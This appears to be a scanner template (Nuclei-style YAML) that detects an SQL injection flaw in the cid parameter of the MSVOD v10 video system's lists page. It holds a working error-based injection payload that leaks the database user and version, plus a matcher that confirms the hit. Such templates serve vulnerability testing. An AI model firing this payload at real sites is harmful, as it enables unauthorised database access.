id: msvod-sqli

info:
  name: 魅思视频系统 v10 版本 lists.html 文件 cid参数 SQL注入漏洞
  author: Str1am
  severity: high
  tags: msvod,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,md5(123),0x7c,user(),0x7c,@@version))%20desc%20--%20"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b7"
        part: body
        condition: and
